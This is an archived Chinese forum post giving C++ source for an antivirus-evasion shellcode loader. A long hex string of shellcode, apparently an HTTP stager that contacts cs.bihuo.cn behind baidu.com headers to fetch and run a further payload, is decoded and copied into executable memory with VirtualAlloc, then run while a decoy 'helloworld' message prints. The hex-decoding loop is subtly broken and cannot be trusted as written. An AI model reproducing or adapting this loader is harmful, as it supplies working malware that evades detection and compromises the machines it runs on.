vc++加载本地shellcode实现免杀-女黑客 - Powered by Discuz! Archiver

nvhack 发表于 2020-3-15 23:00:11

vc++加载本地shellcode实现免杀

#include <string.h>
#include <windows.h>
#include <stdio.h>
#include <iostream>

#pragma warning(disable:4996)
void main()
{
        LPSTR bihuo_output = (LPSTR)"fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d686e6574006877696e6954684c772607ffd531ff5757575757683a5679a7ffd5e9840000005b31c951516a035151686f00000053506857899fc6ffd5eb705b31d252680002608452525253525068eb552e3bffd589c683c35031ff57576aff5356682d06187bffd585c00f84c301000031ff85f6740489f9eb0968aac5e25dffd589c16845215e31ffd531ff576a0751565068b757e00bffd5bf002f000039c774b731ffe991010000e9c9010000e88bffffff2f664b515a0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616900557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d53494520392e303b2057696e646f7773204e5420362e303b20574f5736343b2054726964656e742f352e30290d0a0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f6d0062616964752e636f0068f0b5a256ffd56a4068001000006800004000576858a453e5ffd593b90000000001d9515389e7576800200000535668129689e2ffd585c074c68b0701c385c075e558c3e8a9fdffff63732e626968756f2e636e0000000000";
        //编写bihuo_str 开始
        const char* bihuo_str = bihuo_output;
        int bihuo_length = strlen(bihuo_str);
        unsigned char* value = (unsigned char*)calloc(bihuo_length / 2, sizeof(unsigned char));
        for (size_t count = 0; count < bihuo_length / 2; count++)
        {
                sscanf(bihuo_str, "%2hhx", &value);
                bihuo_str += 2;
        }
        void *exec = VirtualAlloc(0, bihuo_length/2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, value, bihuo_length/2);

        //printf("%s", exec);
        printf("helloworld\n必火网络安全带你走进免杀世界\n");
        ((void(*)())exec)();
       
        //system("pause");
        //cin >> name;
}